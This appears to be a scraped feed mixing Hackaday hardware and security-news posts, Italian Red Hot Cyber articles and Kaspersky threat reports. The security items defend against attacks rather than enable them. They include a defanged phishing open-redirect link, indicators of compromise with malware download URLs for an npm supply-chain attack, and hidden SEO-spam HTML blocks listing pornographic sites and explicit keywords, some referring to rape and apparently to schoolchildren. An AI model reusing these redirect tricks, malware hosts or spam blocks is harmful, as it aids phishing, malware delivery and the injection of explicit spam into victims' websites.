F/0.38 Camera Lens Made With Oil Immersion Microscope Objective
Over on YouTube [Applied Science] shows us how to make an f/0.38 camera lens using an oil immersion microscope objective.
The f-number of a lens indicates how well it will perform in low-light. To calculate the f-number you divide the focal length by the diameter of the aperture. A common f-number is f/1.4 which is generally considered “fast”.
We are told the fastest commercial lens ever used had f/0.7 and was used by Stanley Kubrick to shoot the film Barry Lyndon which was recorded only with candle light.
A microscope objective is a crucial lens that gathers and magnifies light to form an image. It plays a key role in determining the quality and clarity of the final magnified image produced by a microscope.
In this case the microscope objective is optically coupled to the CMOS image sensor using a drop of oil. The oil has better refractive properties than an air-gap. In order to get the closest coupling possible the protective glass sheet on the top of the image sensor was removed. This process resulted in a lot of broken image sensors! Apparently the yield was only two working image sensors from eight attempts at removing the glass.
Of course we’ve seen f-number hacking here at Hackaday before, such as with the A Low F Number Lens, From Scratch which achieved f/0.5.
youtube.com/embed/DQv0nlGsW-s?…
2025 Component Abuse Challenge: Boosting Voltage With Just a Wire
Switching power supplies are familiar to Hackaday readers, whether they have a fairly conventional transformer, are a buck, a boost, or a flyback design. There’s nearly always an inductor involved, whose rapid change in magnetic flux is harnessed to do voltage magic. [Craig D] has made a switching voltage booster that doesn’t use an inductor, instead it’s using a length of conductor, and no, it’s not using the inductance of that conductor as a store of magnetic flux.
Instead it’s making clever use of reflected short pulses in a transmission line for its operation. Electronics students learn all about this in an experiment in which they fire pulses down a length of coax cable and observe their reflections on an oscilloscope, and his circuit is very similar but with careful selection of pulse timing. The idea is that instead of reflected pulses canceling out, they arrive back at the start of the conductor just in time to meet a pulse transition. This causes them to add rather than subtract, and the resulting higher voltage pulse sets off down the conductor again to repeat the process. We can understand the description, but this is evidently one to sit down at the bench and experiment with to fully get to grips with.
[Craig]’s conductor is an alternative to a long coil of coax, a home made delay line of the type once found in the luminance circuit of some color TVs. It’s a coaxial cable in which the outer is formed of a tightly wound coil rather than a solid tube. With it and a high-speed gate driver he can light a couple of neon bulbs, a significant step-up, we think. We’re trying to work out which component is being abused here (other than the gate driver chip he blows) as the conductor is simply performing its natural function. Either way it’s a clever and unexpected circuit, and if it works, we like it.
This project is part of the Hackaday Component Abuse Challenge, in which competitors take humble parts and push them into applications they were never intended for. You still have time to submit your own work, so give it a go!
Hackaday Podcast Episode 342: Poopless Prints, Radio in Your Fillings, and One Hyperspectral Pixel at a Time
It was Elliot and Dan on the podcast today, taking a look at the best the week had to offer in terms of your hacks. We started with surprising news about the rapidly approaching Supercon keynote; no spoilers, but Star Trek fans such as we who don’t have tickets will be greatly disappointed.
Elliot waxed on about taking the poop out of your prints (not pants), Dan got into a camera that adds a dimension to its images, and we both delighted in the inner workings of an air-powered squishy robot.
Questions? We’ve got plenty. Is it possible to take an X-ray without an X-ray tube? Or X-rays, for that matter? Did Lucille Ball crack a spy ring with her fillings? Is Algol set to take over the world? What’s inside a germanium transistor? How does a flipping fish say Happy Birthday? And how far down the Meshtastic rabbit hole did our own Tom Nardi fall? Tune in to find out the answers.
html5-player.libsyn.com/embed/…
Download this free-range, cruelty-free MP3.
Where to Follow Hackaday Podcast
Places to follow Hackaday podcasts:
Episode 342 Show Notes:
News:
What’s that Sound?
- Congrats to [James Barker] for picking the sound of a rake!
Interesting Hacks of the Week:
- SLM Co-extruding Hotend Makes Poopless Prints
- I built a rotating mixing nozzle to print with different colors
- 3D Printer with “rotating nozzle”
- GitHub – Heinz-Loepmeier/nozzleboss
- Waterjet-Cut Precision Pastry
- Waverider: Scanning Spectra One Pixel At A Time
- More Than 100 Sub-Circuit Designs From Texas Instruments
- The Singing Dentures Of Manchester And Other Places
- Printing An Air-Powered Integrated Circuit For Squishy Robots
- Tubeless X-Ray Runs On Patience
Quick Hacks:
- Elliot’s Picks
- Could This Be The Year Of Algol?
- How Bad Can A Cheap Knockoff ADS1115 ADC Be?
- RFIDisk: When Floppy Drives Go Contactless
- Attack Turns Mouse Into Microphone
- Dan’s Picks:
- Toasty Subwoofer Limps Back To Life
- Inside A Germanium Transistor
- Billy Bass Gets New Job As A Voice Assistant
Can’t-Miss Articles:
hackaday.com/2025/10/17/hackad…
DIY Telescope Uses Maker Tools
You’ve got a laser cutter. You’ve got a 3D printer. What do you make? [Ayushmaan45] suggests a telescope. The modest instrument isn’t going to do serious astronomy with only 8X worth of optics, but it would make a fine spyglass for a youngster.
The body is cut from MDF, and there are only a few 3D printed parts. The only other things you need are rubber bands and a pair of lenses. You don’t even need glue. We might have spray painted the inside of the scope black or used some black contact paper to cut down on reflections, although it probably wouldn’t make much difference.
Of course, depending on your lenses, you may have to make some changes. Or find new lenses, for that matter. We like that it doesn’t take any exotic parts. We also appreciate that it is easy for kids to take apart and put back together. It would be interesting to see how a motivated kid might alter the design, as well.
If a kid gets interested, you could move on to a more sophisticated telescope. Or maybe you’d prefer a nice microscope.
Phishing contro PagoPA: nuova campagna abusa di open redirect Google
Il CERT-AGID ha rilevato una nuova variante del phishing ai danni di PagoPA.
La campagna, ancora a tema multe come le precedenti, sfrutta questa volta un meccanismo di open redirect su domini legittimi di Google per rendere i messaggi più credibili e aggirare i controlli automatici.
Come funziona il meccanismo
Ad un primo sguardo il link malevolo
hxxps://adservice.google.be/clk/408533097;208818505;l;?//sitomalevolo.tld/pagina
sembrerebbe portare a un servizio Google, ma in realtà il parametro finale permette di effettuare un open redirect, consente cioè di reindirizzare verso un qualunque URL di un dominio terzo.
La catena di compromissione procede con i seguenti passaggi
L’URL inizia con un sottodominio Google (adservice.google.be) che viene usato come esca, approfittando della reputazione del marchio per far apparire il link sicuro.
Il sottodominio Google adservice reindirizza verso una pagina intermedia ospitata su bio.site, una piattaforma legittima che consente di creare pagine di presentazione con link personalizzati simile a Linktree, anch’esso sfruttato per diverse campagne di phishing.
In questo caso i criminali hanno realizzato una pagina che riproduce il logo di PagoPA e fa riferimento a presunte infrazioni stradali non pagate, invitando l’utente a cliccare su un pulsante con la dicitura “Accedi al servizio di regolamento“.
Il pulsante a sua volta reindirizza l’utente verso la pagina di phishing vera e propria che imita graficamente il portale ufficiale e provvede a raccogliere i dati personali e delle carte elettroniche di pagamento. La risorsa è ospitata su privatedns.org, un servizio legittimo che offre registrazioni gratuite di sottodomini a terzi, spesso usato per progetti temporanei o test, ma frequentemente abusato da attori malevoli poiché consente di creare indirizzi difficili da tracciare o bloccare in modo centralizzato.
Questo tipo di approccio non è nuovo
Un caso analogo era già stato documentato nel 2023 sul sito web-inspection.de, dove veniva segnalato lo stesso abuso dei domini Google, in particolare adservice.google.de, ma il comportamento è presente anche sui domini equivalenti .it e .com.
Nell’analisi, intitolata “INSPECTION finds Open Redirect Fraud on Google Pages”, viene descritto lo stesso schema oggi osservato: reindirizzamenti aperti, indicizzazione di link manipolati e impiego del cloaking per celare i contenuti fraudolenti.
Tuttavia, nel caso attuale, non si tratta di cloaking in senso stretto: la pagina ospitata su bio.site non varia i contenuti in base al visitatore, ma rappresenta piuttosto un uso ingannevole di un servizio legittimo come passaggio intermedio, sfruttato per carpire la fiducia dell’utente e aggirare i controlli di sicurezza automatizzati.
Dati sul phishing PagoPA
Da marzo 2025, quando è stata individuata la prima campagna a tema, il CERT-AGID ha rilevato 220 campagne di phishing riconducibili ad abusi verso PagoPA, grazie anche alle segnalazioni quotidiane inviate dagli utenti colpiti.
Nel complesso, sono stati prodotti e condivisi 2.574 Indicatori di Compromissione (IoC) con le amministrazioni e i soggetti accreditati, per supportare le attività di blocco tempestivo dei siti fraudolenti.
L'articolo Phishing contro PagoPA: nuova campagna abusa di open redirect Google proviene da Red Hot Cyber.
This Week in Security: F5, SonicWall, and the End of Windows 10
F5 is unintentionally dabbling in releasing the source code behind their BIG-IP networking gear, announcing this week that an unknown threat actor had access to their internal vulnerability and code tracking systems. This security breach was discovered on August 9th, and in the time since, F5 has engaged with CrowdStrike, Mandiant, and NCC Group to review what happened.
So far it appears that the worst result is access to unreleased vulnerabilities in the F5 knowledge management system. This means that any unpatched vulnerabilities were effectively 0-days, though the latest set of patches for the BIG-IP system has fixed those flaws. There aren’t any reports of those vulnerabilities being exploited in the wild, and F5 has stated that none of the leaked vulnerabilities were critical or allowed for remote exploitation.
Slightly more worrying is that this access included the product development environment. The problem there isn’t particularly the leak of the source code — one of the covered projects is NGINX, which is already open source software. The real danger is that changes could have been surreptitiously added to those codebases. The fact that NGINX is Open Source goes a long way to alleviate that danger, and when combined with the security built into tools like git, it seems very unlikely that malicious code could be sneaked into the NGINX public code base. A thorough review of the rest of the F5 codebases has similarly come up negative, and so far it looks like the supply-chain bullet has been dodged.
WatchGuard Out of Bounds
WatchGuard’s Fireware OS has a stack buffer overflow. There’s a few interesting details about this story. The first, as WatchTowr researchers gleefully point out, is that it’s 2025 and a security vendor has a stack overflow bug straight out of the ’90s. But second, this is one of the first vulnerabilities we’ve covered that has a CVSS 4.0 score. In CVSS 3 terms, this would be a severity 10 vulnerability. As the the 4th iteration of the Common Vulnerability Scoring System also measures the impact on the rest of the network, it scores a bit lower 9.3 there, though one could probably make an argument that it should be higher.
The actual vulnerability is in the VPN service, and it’s as simple as it gets. An attacker controlled buffer is copied into a fixed length memory region without any bounds checking. That VPN service uses an IKEv2 handshake protocol to establish connections, and the server responds with an odd Base64 encoded string. Decode the string, and it turns out the vulnerable service announces VN=12.11.3 BN=719894, the version number and build string, allowing for super easy identification of vulnerable targets.
The final step in turning this into a true vulnerability is to corrupt the stack, take control of the program counter, and Return-Oriented-Program your way through a couple gadgets to be able to call system(). Right? This platform doesn’t turn on every mitigation — stack canaries and position independent execution are noticeably missing. But there are some good hardening steps that were done, like leaving out /bin/sh altogether. How do you run shellcode when the machine doesn’t have a shell at all? The answer the WatchTowr crew turned to was to run the system code in the Python3 shell. Thinking outside the box!
Sonicwall and Unintentional Distributed Backups
About a month ago, we shared the news that Sonicwall had a breach of their own, with limited customers backups being exposed. At the time, the word was that fewer than 5% of customers would be affected. That estimate seems to have been a bit optimistic, as SonicWall is now recommending that all customers step through their new remediation playbook, which calls for a complete cycling of all credentials stored on Sonicwall devices.
It’s unclear if this is because more configuration data was accessible than was previously believed, or because attackers are actively using the pilfered data in attacks against SonicWall customers. The unintentional distribution of system backups turns out not to have been a good strategy.
UEFI Backdoor
UEFI and Secure Boot have been viewed with skepticism, particularly by Linux enthusiasts over the years. There is, however, something to be said for the idea that your computer won’t boot a manipulated OS without your permission, and especially since major Linux distros have access to signed Secure Boot keys, it hasn’t been the dystopian disaster that many of us feared. The security question of the UEFI root of trust has had its own problems, and one of those problems has recently bitten Framework laptops. The issue is the mm (Memory Modify) command that can optionally be built into UEFI shells. This is strictly for debugging purposes, and it’s been discovered that allowing arbitrary access to system memory is not great for system security.
Eclypsium researchers are calling this one BombShell, and it boils down to overwriting the security handler pointer in the UEFI firmware, so all Secure Boot checks are disabled. It seems that this level of tampering is invisible to the system and booted OS. And with just a bit of cleverness, it can be injected as a permanent boot payload. While it’s specifically Framework laptops that are in question with this specific disclosure, it’s not strictly a Framework issue, but can affect any UEFI machine that ships a signed UEFI shell, that includes dangerous commands like mm.
Hack a Car Company, and All the Cars
We have a delightful hack from Def Con 33, where an as-of-yet-unnamed car brand had a couple security problems with their admin web portal, and those problems are pretty serious when put together. First, the invite-only dealer portal didn’t actually verify the invite tokens. And second, when creating an account, the back-end didn’t actually check the account creation details. Meaning that anyone that knew where to look could create an admin account.
The result was that a VIN number could be used to look up a car, and the owner’s details could be accessed. Or the system could be searched via owner’s information, to find vehicle information. It allowed transferring authentication of one of the vehicles to a new mobile app account, and the mobile app could be used to unlock the vehicle.
youtube.com/embed/U1VKazuvGrc?…
Windows 10
It’s time to turn out the lights, the party is over. The sun has set and Windows 10 has entered its twilight. The advice from every other legacy OS applies: upgrade if you can. Yes, there are some frustrating problems with upgrading to Windows 11, particularly if your machine is just too old to have a TPM or Secure Boot.
If you’re stuck on Windows 10, there’s good news and bad news. The good news is that Microsoft is making security updates available for free, for many computers, if you use a Microsoft account on the machine. The bad news is that those updates are a monthly trickle of fresh vulnerabilities that some machines just won’t ever get patched for.
Bits and Bytes
What do you do when you’re flying, and you’re too cheap frugal to pay for in-flight wifi? Naturally, find some way to tunnel out for free. The key is usually DNS. It’s probably the inverse of the meme, that the problem is always DNS, as that’s the last thing a security hardening team wants to break. And if that won’t work, there’s always MAC address cloning.
Many a pen test has hit a brick wall when faced with a gRPC endpoint. Google’s Remote Procedure Call framework is binary, and without reflection turned on, extremely difficult to map what calls are available. There’s a new tool, grpc-scan, that just might shed some light on the subject. It’s a combination of common design patterns, and carefully parsing the returned errors to learn about the system.
And finally, where’s the most bulletproof place you can host some malicious code? A server in Russia? Apparently it’s now on the blockchain. This isn’t a theoretical attack from a security thinktank, but a real-world malware campaign believed to originate from North Korean hackers. Yet another red flag to watch out for in smart contracts!
Microsoft blocca Vanilla Tempest: Falsi installer di Teams diffondevano ransomware Rhysida
All’inizio di ottobre 2025, Microsoft ha interrotto un’ampia operazione malevola attribuita al gruppo Vanilla Tempest, revocando più di 200 certificati digitali utilizzati per firmare in modo fraudolento file di installazione di Microsoft Teams.
Questi pacchetti falsi servivano come vettore per diffondere la backdoor Oyster e, successivamente, il ransomware Rhysida.
La scoperta e le contromisure
La campagna è stata individuata a fine settembre 2025, dopo mesi di attività in cui l’attore della minaccia aveva sfruttato file binari apparentemente legittimi.
In risposta, Microsoft Defender Antivirus ha aggiornato le proprie firme per riconoscere e bloccare sia i falsi installer di Teams sia i malware coinvolti, mentre Microsoft Defender for Endpoint è stato potenziato per individuare i tattiche, tecniche e procedure (TTP) tipiche di Vanilla Tempest.
Il profilo del gruppo
Vanilla Tempest, noto anche con gli alias VICE SPIDER o Vice Society in altri report di sicurezza, è un gruppo di cybercriminali motivato da fini economici. Le sue operazioni si concentrano su attacchi ransomware e furto di dati sensibili con finalità di estorsione. Nel tempo, ha distribuito diversi payload, tra cui BlackCat, Quantum Locker e Zeppelin, ma negli ultimi mesi si è orientato principalmente verso Rhysida.
La tecnica d’attacco
Nel corso della campagna, i criminali hanno diffuso alcuni falsi file denominati MSTeamsSetup.exe, ospitati su domini malevoli che simulavano siti ufficiali di Microsoft Teams, come teams-download[.]buzz, teams-install[.]run e teams-download[.]top.
Gli utenti, venivano presumibilmente indirizzati a questi siti attraverso attacchi di avvelenamento SEO, una tecnica che manipola i risultati dei motori di ricerca per far apparire i domini infetti tra i primi risultati.
Una volta eseguito, il falso installer generava un loader che a sua volta installava Oyster, una backdoor già impiegata da Vanilla Tempest a partire da giugno 2025, ma che il gruppo ha iniziato a firmare digitalmente in modo fraudolento da settembre 2025.
Per conferire un’apparente legittimità ai file distribuiti, Vanilla Tempest ha abusato dei servizi di Trusted Signing e delle autorità di certificazione SSL[.]com, DigiCert e GlobalSign, riuscendo così a eludere inizialmente i controlli di sicurezza.
La risposta di Microsoft
Microsoft ha dichiarato che Defender Antivirus, se completamente attivo, è in grado di bloccare l’intera catena d’attacco. Inoltre, Defender for Endpoint fornisce strumenti di analisi e mitigazione per aiutare le organizzazioni a indagare su eventuali compromissioni.
L’azienda ha condiviso pubblicamente i dettagli tecnici dell’operazione per rafforzare la cooperazione nella comunità di cybersecurity e migliorare la capacità di risposta collettiva a questo tipo di minacce.
L'articolo Microsoft blocca Vanilla Tempest: Falsi installer di Teams diffondevano ransomware Rhysida proviene da Red Hot Cyber.
Arturo Di Corinto presenta i Security day di Fortinet
È stato bello condurre i security days di Fortinet a Milano.
Bella atmosfera, ottima organizzazione, relatori eccellenti.
C’erano 1500 persone in sala. Un record.
Non è stato difficile gestire tutta la giornata visto che gli speaker erano tutti bravi. A cominciare da Massimo Palermo, vice presidente di Fortinet, economista prestato alla cybersecurity.
Tutto è incominciato con un intervento spettacolare di Roberto Caramia capo del CSIRT Italia (sì siamo amici e lo stimo molto)
Ho apprezzato molto l’analisi che Filippo Cassini e Aldo Di Mattia hanno fatto delle minacce emergenti e in particolare dell’IA, e anche l’intervento stimolante di Stefano Mele che ha parlato della regolazione come fattore di creazione di fiducia. Bello e provocatorio poi è stato il talk di un altro collega e amico come Alessandro Curioni che ha scudisciato l’hype tecnologico che va a discapito della comprensione della tecnologia stessa.
Ma sono stati bell anche i panel, quelli coi partner e con le donne. Sul palco ho potuto intervistare senza rete il Ciso di Juventus, Mirko Rinaldini, il Cio di Bpm, Adolfo Pellegrino il CTO di Prysmian, Alessandro Bottin e Sapio, Riccardo Salierno, (persona squisita). Quattro campioni italiani.
Grazie anche a Greta Nasi Selene Giupponi e alla Andrea Bocelli Foundation che ci hanno parlato di parità di genere, salari e Burn out.
Un sentito ringraziamento a loro e alla Polizia di Stato (Tx Rocco Nardulli) per quanto fanno nel campo dell’educazione cyber.
Cara Valentina Sudano hai fatto un bel lavoro con tutta la tua squadra.
Site of Secret 1950s Cold War Iceworm Project Rediscovered
The overall theme of the early part of the Cold War was that of subterfuge — with scientific missions often providing excellent cover for placing missiles right on the USSR’s doorstep. Recently NASA rediscovered Camp Century, while testing a airplane-based synthetic aperture radar instrument (UAVSAR) over Greenland. Although established on the surface in 1959 as a polar research site, and actually producing good science from e.g. ice core samples, beneath this benign surface was the secretive Project Iceworm.
By 1967 the base was forced to be abandoned due to shifting ice caps, which would eventually bury the site under over 30 meters of ice. Before that, the scientists would test out the PM-2A small modular reactor. It not only provided 2 MW of electrical power and heat to the base, but was itself subjected to various experiments. Alongside this public face, Project Iceworm sought to set up a network of mobile nuclear missile launch sites for Minuteman missiles. These would be located below the ice sheet, capable of surviving a first strike scenario by the USSR. A lack of Danish permission, among other complications, led to the project eventually being abandoned.
It was this base that popped up during the NASA scan of the ice bed. Although it was thought that the crushed remains would be safely entombed, it’s estimated that by the year 2100 global warming will have led to the site being exposed again, including the thousands of liters of diesel and tons of hazardous waste that were left behind back in 1967. The positive news here is probably that with this SAR instrument we can keep much better tabs on the condition of the site as the ice cap continues to grind it into a fine paste.
Top image: Camp Century in happier times. (Source: US Army, Wikimedia)
Post-exploitation framework now also delivered via npm
Incident description
The first version of the AdaptixC2 post-exploitation framework, which can be considered an alternative to the well-known Cobalt Strike, was made publicly available in early 2025. In spring of 2025, the framework was first observed being used for malicious means.
In October 2025, Kaspersky experts found that the npm ecosystem contained a malicious package with a fairly convincing name: https-proxy-utils. It was posing as a utility for using proxies within projects. At the time of this post, the package had already been taken down.
The name of the package closely resembles popular legitimate packages: http-proxy-agent, which has approximately 70 million weekly downloads, and https-proxy-agent with 90 million downloads respectively. Furthermore, the advertised proxy-related functionality was cloned from another popular legitimate package proxy-from-env, which boasts 50 million weekly downloads. However, the threat actor injected a post-install script into https-proxy-utils, which downloads and executes a payload containing the AdaptixC2 agent.
Metadata for the malicious (left) and legitimate (right) packages
OS-specific adaptation
The script includes various payload delivery methods for different operating systems. The package includes loading mechanisms for Windows, Linux, and macOS. In each OS, it uses specific techniques involving system or user directories to load and launch the implant.
In Windows, the AdaptixC2 agent is dropped as a DLL file into the system directory C:\Windows\Tasks. It is then executed via DLL sideloading. The JS script copies the legitimate msdtc.exe file to the same directory and executes it, thus loading the malicious DLL.
Deobfuscated Windows-specific code for loading AdaptixC2
In macOS, the script downloads the payload as an executable file into the user’s autorun directory: Library/LaunchAgents. The postinstall.js script also drops a plist autorun configuration file into this directory. Before downloading AdaptixC2, the script checks the target architecture (x64 or ARM) and fetches the appropriate payload variant.
Deobfuscated macOS-specific code for loading AdaptixC2
In Linux, the framework’s agent is downloaded into the temporary directory /tmp/.fonts-unix. The script delivers a binary file tailored to the specific architecture (x64 or ARM) and then assigns it execute permissions.
Deobfuscated Linux-specific code for loading AdaptixC2
Once the AdaptixC2 framework agent is deployed on the victim’s device, the attacker gains capabilities for remote access, command execution, file and process management, and various methods for achieving persistence. This both allows the attacker to maintain consistent access and enables them to conduct network reconnaissance and deploy subsequent stages of the attack.
Conclusion
This is not the first attack targeting the npm registry in recent memory. A month ago, similar infection methods utilizing a post-install script were employed in the high-profile incident involving the Shai-Hulud worm, which infected more than 500 packages. The AdaptixC2 incident clearly demonstrates the growing trend of abusing open-source software ecosystems, like npm, as an attack vector. Threat actors are increasingly exploiting the trusted open-source supply chain to distribute post-exploitation framework agents and other forms of malware. Users and organizations involved in development or using open-source software from ecosystems like npm in their products are susceptible to this threat type.
To stay safe, be vigilant when installing open-source modules: verify the exact name of the package you are downloading, and more thoroughly vet unpopular and new repositories. When using popular modules, it is critical to monitor frequently updated feeds on compromised packages and libraries.
Indicators of compromise
Package name
https-proxy-utils
Hashes
DFBC0606E16A89D980C9B674385B448E – package hash
B8E27A88730B124868C1390F3BC42709
669BDBEF9E92C3526302CA37DC48D21F
EDAC632C9B9FF2A2DA0EACAAB63627F4
764C9E6B6F38DF11DC752CB071AE26F9
04931B7DFD123E6026B460D87D842897
Network indicators
cloudcenter[.]top/sys/update
cloudcenter[.]top/macos_update_arm
cloudcenter[.]top/macos_update_x64
cloudcenter[.]top/macosUpdate[.]plist
cloudcenter[.]top/linux_update_x64
cloudcenter[.]top/linux_update_arm
A New Golden Age of Browser Games
Arguably, the golden age of browser gaming occurred in the 00s mostly revolving around Adobe Flash. This was an era with high creativity and a low barrier of entry, and also decentralized from gatekeeping app stores. Sadly, these times have passed us by as the security concerns around Flash led to its discontinuation and most casual gamers have migrated to the app store for their fix. But that doesn’t stop some from continuing to bring gaming to the browser, even if those games were never intended for it in the first place like this browser port of Celeste.
Celeste is an indie platformer where the player climbs a mysterious mountain while confronting her inner struggles. Originally meant for consoles and PC, a group of friends including [velzie], [bomberfish], and [Toshit] aka [r58Playz] took this as a challenge especially after seeing someone else’s half finished web port of this game. Most of the build revolves around WebAssembly (wasm) and around “cursed” .NET runtime hacks which also allow the port to run the community-made Everest mod loader. It uses a multithreaded and JIT compiling version of mono-wasm backported from .NET 10 to .NET 9 to maximize performance. The team actually first started by porting Terraria to the browser, and then moved on to this Celeste port from there.
The port of Celeste can be played here, and their port of Terraria is also available, although may not support a ton of Hackaday traffic so some patience is advised. There are also GitHub repositories for Celeste and Terraria as well. With impressive ports of relatively modern games moving into the browser, perhaps we’re entering a new golden age of browser gaming; we’ve also seen things like Minecraft implemented in only HTML and CSS lately as well.
SEO spam and hidden links: how to protect your website and your reputation
When analyzing the content of websites in an attempt to determine what category it belongs to, we sometimes get an utterly unexpected result. It could be the official page of a metal structures manufacturer or online flower shop, or, say, a law firm website, with completely neutral content, but our solutions would place it squarely in the “Adult content” category. On the surface, it is completely unclear how our systems arrived at that verdict, but one look at the content categorization engine’s page analysis log clears it up.
Invisible HTML block, or SEO spam
The website falls into the questionable category because it contains an HTML block with links to third-party sites, invisible to regular users. These sites typically host content of a certain kind – which, in our experience, is most often pornographic or gambling materials – and in the hidden block, you will find relevant keywords along with the links. These practices are a type of Black Hat SEO, or SEO spam: the manipulation of website search rankings in violation of ethical search engine optimization (SEO) principles. Although there are many techniques that attackers use to raise or lower websites in search engine rankings, we have encountered hidden blocks more frequently lately, so this is what this post focuses on.
Website owners rarely suspect a problem until they face obvious negative consequences, such as a sharp drop in traffic, warnings from search engines, or complaints from visitors. Those who use Kaspersky solutions may see their sites blocked due to being categorized as prohibited, a sign that something is wrong with them. Our engine detects both links and their descriptions that are present in a block like that.
How hidden links work
Hyperlinks that are invisible to regular users but still can be scanned by various analytical systems, such as search engines or our web categorization engine, are known as “hidden links”. They are often used for scams, inflating website rankings (positions in search results), or pushing down the ranking of a victim website.
To understand how this works, let us look at how today’s SEO functions in the first place. A series of algorithms is responsible for ranking websites in search results, such as those served by Google. The oldest and most relevant one to this article is known as PageRank. The PageRank metric, or weight in the context of this algorithm, is a numerical value that determines the importance of a specific page. The higher the number of links from other websites pointing to a page, and the greater those websites’ own weights, the higher the page’s PageRank.
So, to boost their own website’s ranking in search results, the malicious actor places hidden links to it on the victim website. The higher the victim website’s PageRank, the more attractive it is to the attacker. High-traffic platforms like blogs or forums are of particular interest to them.
However, PageRank is no longer the only method search engines use to measure a website’s value. Google, for example, also applies other algorithms, such as the artificial intelligence-based RankBrain or the BERT language model. These algorithms use more sophisticated metrics, such as Domain Authority (that is, how much authority the website has on the subject the user is asking about), link quality, and context. Placing links on a website with a high PageRank can still be beneficial, but this tactic has a severely limited effect due to advanced algorithms and filters aimed at demoting sites that break the search engine’s rules. Examples of these filters are as follows:
- Google Penguin, which identifies and penalizes websites that use poor-quality or manipulative links, including hidden ones, to boost their own rankings. When links like these are detected, their weight can be zeroed out, and the ranking may be lowered for both sites: the victim and the spam website.
- Google Panda, which evaluates content quality. If the website has a high PageRank, but the content is of low quality, duplicated, auto-generated, or otherwise substandard, the site may be demoted.
- Google SpamBrain, which uses machine learning to analyze HTML markup, page layouts, and so forth to identify manipulative patterns. This algorithm is integrated into Google Penguin.
What a Black Hat SEO block looks like in a page’s HTML markup
Let us look at some real examples of hidden blocks we have seen on legitimate websites and determine the attributes by which these blocks can be identified.
Example 1
<div style="display: none;">
افلام سكس اعتصاب <a href="https://www.azcorts.com/" rel="dofollow" target="_self">azcorts.com</a> قنوات جنسية
free indian porn com <a href="https://porngun.mobi" target="_self">porngun.mobi</a> xharmaster
石原莉紅 <a href="https://javclips.mobi/" target="_blank" title="javclips.mobi">javclips.mobi</a> ちっぱい
bank porn <a href="https://pimpmpegs.net" target="_self" title="pimpmpegs.net free video porn">pimpmpegs.net</a> wwwporm
salamat lyrics tagalog <a href="https://www.teleseryeone.com/" target="_blank" title="teleseryeone.com sandro marcos alexa miro">teleseryeone.com</a> play desi
</div>
<div style="display: none;">
كسى بيوجعنى <a href="https://www.sexdejt.org/" rel="dofollow">sexdejt.org</a> سكس سانى
indian sex video bp <a href="https://directorio-porno.com/" rel="dofollow" target="_self" title="directorio-porno.com">directorio-porno.com</a> xvideos indian pussy
swara bhaskar porn <a href="https://greenporn.mobi" title="greenporn.mobi lesbian porn hq">greenporn.mobi</a> kannada sexy video
bp sex full <a href="https://tubepornmix.info" target="_blank" title="tubepornmix.info aloha tube porn video">tubepornmix.info</a> lily sex
pinayflix pamasahe <a href="https://www.gmateleserye.com/" rel="dofollow" target="_blank">gmateleserye.com</a> family feud november 17
</div>
<div style="display: none;">
sunny leone ki bp download <a href="https://eroebony.info" target="_self" title="eroebony.info">eroebony.info</a> hansika xvideos
موقع سكس ايطالى <a href="https://bibshe.com/" target="_self" title="bibshe.com سكس العادة السرية">bibshe.com</a> صور احلى كس
raja rani coupon result <a href="https://booketube.mobi" rel="dofollow">booketube.mobi</a> exercise sex videos
indianbadwap <a href="https://likeporn.mobi" rel="dofollow" target="_blank" title="likeporn.mobi free hd porn">likeporn.mobi</a> rabi pirzada nude video
marathi porn vidio <a href="https://rajwap.biz" rel="dofollow" target="_blank" title="rajwap.biz">rajwap.biz</a> www.livesex.com
</div>This example utilizes a simple CSS style, <div style="display: none;">. This is one of the most basic and widely known methods for concealing content; the parameter display:none; stands for “do not display”. We also see that each invisible <div> section contains a set of links to low-quality pornographic websites along with their keyword-stuffed descriptions. This clearly indicates spam, as the website where we found this block has no relation whatsoever to the type of content being linked to.
Another sign of Black Hat SEO in the example is the attribute rel="dofollow". This instructs search engines that the link carries link juice, meaning it passes weight. Spammers intentionally set this attribute to transfer authority from the victim website to the ones they are promoting. In standard practice, webmasters may, conversely, use rel="nofollow", which signifies that the presence of the link on the site should not influence the ranking of the website where it leads.
Thus, the combination of a hidden block ( display:none;) and a set of external pornographic (in this instance) links with the rel="dofollow" attribute unequivocally point to a SEO spam injection.
Note that all <div> sections are concentrated in one spot, at the end of the page, rather than scattered throughout the page code. This block demonstrates a classic Black Hat SEO approach.
Example 2
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">سكس انجليز <a href="https://wfporn.com/" target="_self" title="wfporn.com افلام سحاق مترجم">wfporn.com</a> سكس كلاسيك مترجم</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">فيلم سكس <a href="https://www.keep-porn.com/" rel="dofollow" target="_blank">keep-porn.com</a> سكس هندى اغتصاب</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">desi nude tumbler <a href="https://www.desixxxv.net" title="desixxxv.net free hd porn video">desixxxv.net</a> kanpur sexy video</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">www wap sex video com <a href="https://pornorado.mobi" target="_self">pornorado.mobi</a> sexy film video mp4</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">mom yes porn please <a href="https://www.movsmo.net/" rel="dofollow" title="movsmo.net">movsmo.net</a> yes porn please brazzers</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">xxx download hd <a href="https://fuxee.mobi" title="fuxee.mobi">fuxee.mobi</a> fat woman sex</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">bangalore xxx <a href="https://bigassporntrends.com" rel="dofollow" target="_self" title="bigassporntrends.com">bigassporntrends.com</a> sexy video kashmir</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">xnxx sister sex <a href="https://wetwap.info" rel="dofollow" target="_self" title="wetwap.info hd porn streaming">wetwap.info</a> blue film a video</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">tamilschoolsexvideo <a href="https://tubetria.mobi" rel="dofollow" title="tubetria.mobi">tubetria.mobi</a> sex free videos</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">سكس من اجل المال مترجم <a href="https://www.yesexyporn.com/" title="yesexyporn.com فوائد لحس الكس">yesexyporn.com</a> نسوان شرميط</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">kamapishi <a href="https://desisexy.org/" target="_blank" title="desisexy.org free porn gay hd online">desisexy.org</a> savita bhabhi xvideo</div>
